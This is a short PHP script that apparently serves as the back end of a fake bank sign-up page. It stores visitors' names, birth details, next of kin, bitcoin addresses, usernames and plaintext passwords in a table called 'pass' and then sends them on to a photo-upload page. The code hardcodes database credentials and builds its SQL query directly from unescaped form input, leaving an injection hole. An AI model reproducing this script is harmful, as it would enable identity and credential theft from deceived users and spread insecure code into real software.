<?php
$dbhost = "localhost";
$dbuser = "satellitebnk_go";
$dbpassword = "60803144_ME";
$dbdatabase = "satellitebnk_go";
$db = mysql_connect($dbhost, $dbuser, $dbpassword);
mysql_select_db($dbdatabase, $db);
$con = mysql_connect("localhost","satellitebnk_go","60803144_ME");
if (!$con)
  {
  die('Could not connect: ' . mysql_error());
  }

mysql_select_db("my_db", $con);

$sql="INSERT INTO pass (Name, Country, Nationality, Date, Gender, Current, Bitcoin, Email, Phonenumber, Primarygo, Nextofkin, Placeofbirth, Username, Password)
VALUES
('$_POST[name]','$_POST[country]','$_POST[nationality]','$_POST[date]','$_POST[gender]','$_POST[current]','$_POST[bitcoin]','$_POST[email]','$_POST[phonenumber]','$_POST[primarygo]','$_POST[nextofkin]','$_POST[placeofbirth]','$_POST[username]','$_POST[password]')";


if (!mysql_query($sql,$con))
  {
  die('Error: ' . mysql_error());
  }
header('Location: photoupload.html');

mysql_close($con)
?>
